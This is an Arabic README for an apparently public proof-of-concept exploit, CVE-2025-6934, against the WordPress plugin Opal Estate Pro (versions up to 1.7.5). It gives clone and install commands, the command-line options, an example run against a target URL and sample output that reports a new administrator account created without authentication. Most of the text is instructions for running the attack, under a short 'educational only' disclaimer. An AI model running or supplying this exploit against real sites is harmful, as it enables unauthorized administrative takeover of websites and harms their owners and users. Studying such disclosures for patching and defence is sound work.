
استغلال PoC آلي لـ WordPress Opal Estate Pro يكتشف الإصدارات المعرضة للخطر، ويسترجع الـ nonce، وينشئ حسابات مدير غير مصرح بها.
CVE-2025-6934 هو استغلال لإثبات المفهوم (PoC) يستهدف إضافة ووردبريس: Opal Estate Pro ≤ 1.7.5.
يُظهر هذا الاستغلال إنشاء حساب مسؤول دون مصادقة.
إخلاء مسؤولية: هذا الاستغلال (PoC) لأغراض تعليمية فقط. لا تستخدمه على أنظمة دون إذن.
git clone https://github.com/Rosemary1337/CVE-2025-6934.git
cd CVE-2025-6934
pip install -r requirements.txt
المتطلبات:
requests,beautifulsoup4,colorama
python3 main.py -u <TARGET_URL> -mail <EMAIL> -password <PASSWORD> -user <USERNAME>
python3 main.py -u http://site.com/ -mail [email protected] -password 3xplo1tI5Fun -user r1337
| الخيار | الوصف | مطلوب | الافتراضي |
|---|---|---|---|
-u, --url | رابط الموقع المستهدف | نعم | - |
-mail, --newmail | البريد الإلكتروني للمسؤول الجديد | نعم | - |
-password, --newpassword | كلمة مرور المسؤول الجديد | نعم | - |
-user, --username | اسم مستخدم المسؤول الجديد | لا | administrator |
تعرض وحدة التحكم:
[•][✔][✖][i]مثال:
[•] Starting Exploit...
[✔] Nonce Found: xyz123
[✔] Exploit Successful!
Username : r1337
Email : [email protected]
Password : 3xplo1tI5Fun
Role : administrator
أنا مطوّر نشط أستمتع ببناء الأدوات ومشاركة المعرفة. يمكنك التواصل معي عبر: